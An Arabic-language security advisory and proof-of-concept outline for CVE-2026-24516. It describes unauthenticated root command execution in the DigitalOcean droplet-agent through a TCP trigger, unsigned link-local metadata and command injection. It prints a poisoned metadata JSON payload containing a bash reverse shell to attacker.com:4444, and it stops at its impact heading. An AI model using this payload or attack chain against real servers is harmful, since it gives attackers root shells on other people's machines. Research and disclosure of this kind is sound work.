
تحليل تقني وإثبات مفهوم لـ CVE-2026-24516: تنفيذ تعليمات برمجية عن بُعد بصلاحيات الجذر دون مصادقة في DigitalOcean Droplet Agent (CVSS 10.0).
المعرّف: CVE-2026-24516
العنوان: تنفيذ أوامر عن بُعد بصلاحيات الجذر دون مصادقة عبر تسميم البيانات الوصفية والقناة الجانبية
الخطورة: حرجة (CVSS v3.1: 10.0 / AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
الباحث: Anmol Singh Rajput (@poxsky)
المتأثر: DigitalOcean Droplet Agent (droplet-agent) <= v1.3.2
================================================================================
يُعدّ 'droplet-agent' خادم نظام مُميّز الصلاحيات (UID 0) مُصمَّمًا للقياس التليمتري والتشخيص عن بُعد. يحافظ على حالة مراقبة سلبية حتى استلام تسلسل إشارات محدّد. تكمن الثغرة الجوهرية في "نموذج الثقة الضمني" لخدمة البيانات الوصفية للرابط المحلي (169.254.169.254)، التي تفتقر إلى فحوصات السلامة التشفيرية.
أ. القناة الجانبية السلبية لـ TCP (طبقة الإشارات) يستخدم الوكيل مستمعًا خامًا للمقابس (internal/metadata/watcher/ssh_watcher.go) على المنفذ 22. يُجري انتقال الحالة من IDLE إلى ACTIVE بناءً على ثوابت سحرية مُضمَّنة في ترويسة TCP:
التحليل: يخلق هذا مُشغّلًا حتميًا. يمكن لمهاجم خارجي انتحال هوية مستوى التحكم في البنية التحتية عبر تزوير حزمة TCP SYN واحدة بهذه القيم السحرية.
ب. انتهاك حدود الثقة (خلل الرابط المحلي) عند الإشارة، يجلب الوكيل تعليمات JSON من نقطة نهاية البيانات الوصفية السحابية. الثغرة هي غياب التحقق من الأصالة. يتعامل الوكيل مع نطاق 169.254.169.254 باعتباره "منطقة موثوقة محصّنة"، فاشلًا في التحقق من توقيعات الحمولة (HMAC/mTLS).
ج. المصبّ: حقن أوامر غير مُعقَّم يحتوي 'TroubleshootingActioner' (internal/troubleshooting/actioner/actioner.go) على مصبّ حيث يُحلّل مصفوفة 'requesting'.
الانتحال: يحدّد المهاجم ثغرة SSRF في تطبيق مُستضاف لتمرير الطلبات إلى خدمة البيانات الوصفية للرابط المحلي.
التسميم: يُعِدّ المهاجم خادم بيانات وصفية خبيثًا يُرجع: {"requesting": ["command:bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'"]}
الطَّرْق: يُرسل المهاجم مُشغّل TCP "DODO-TTY" إلى المنفذ 22.
التنفيذ: يجلب الوكيل JSON المسموم ويُنفّذ الصدفة العكسية بمعرّف مستخدم فعّال 0 (الجذر).
تقييم التأثير
